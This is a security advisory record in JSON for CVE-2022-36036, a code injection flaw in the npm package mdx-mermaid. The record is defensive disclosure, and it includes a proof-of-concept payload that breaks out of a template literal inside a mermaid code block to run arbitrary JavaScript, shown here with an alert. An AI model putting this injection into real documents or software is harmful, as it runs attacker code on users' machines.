{"id":"GHSA-rvgm-35jw-q628","summary":"Improper Control of Generation of Code ('Code Injection') in mdx-mermaid","details":"### Impact\n\nArbitary javascript injection\n\nModify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs\n\n```\n` + (function () {\n  // Put Javascript code here\n  return ''\n}()) + `\n```\n\nThe block below shows a valid mermaid code block\n\n````md\n```mermaid\ngraph TD;\n    A--\u003eB;\n    A--\u003eC;\n    B--\u003eD;\n    C--\u003eD;\n```\n````\n\nThe same block but with the exploit added\n\n````md\n```mermaid\n` + (function () {\n  alert('vulnerable')\n  return ''\n}()) + `\ngraph TD;\n    A--\u003eB;\n    A--\u003eC;\n    B--\u003eD;\n    C--\u003eD;\n```\n````\n\n### Patches\n1.3.0 and 2.0.0-rc2\n\n### Workarounds\nNone known","aliases":["CVE-2022-36036"],"modified":"2023-11-08T04:09:58.603883Z","published":"2022-08-31T22:26:11Z","database_specific":{"cwe_ids":["CWE-94"],"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2022-08-31T22:26:11Z","nvd_published_at":"2022-08-29T18:15:00Z"},"references":[{"type":"WEB","url":"https://github.com/sjwall/mdx-mermaid/security/advisories/GHSA-rvgm-35jw-q628"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36036"},{"type":"WEB","url":"https://github.com/sjwall/mdx-mermaid/commit/f2b99386660fd13316823529c3f1314ebbcdfd2a"},{"type":"PACKAGE","url":"https://github.com/sjwall/mdx-mermaid"}],"affected":[{"package":{"name":"mdx-mermaid","ecosystem":"npm","purl":"pkg:npm/mdx-mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.3.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-rvgm-35jw-q628/GHSA-rvgm-35jw-q628.json"}},{"package":{"name":"mdx-mermaid","ecosystem":"npm","purl":"pkg:npm/mdx-mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.0.0-rc1"},{"fixed":"2.0.0-rc2"}]}],"versions":["2.0.0-rc1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-rvgm-35jw-q628/GHSA-rvgm-35jw-q628.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"}]}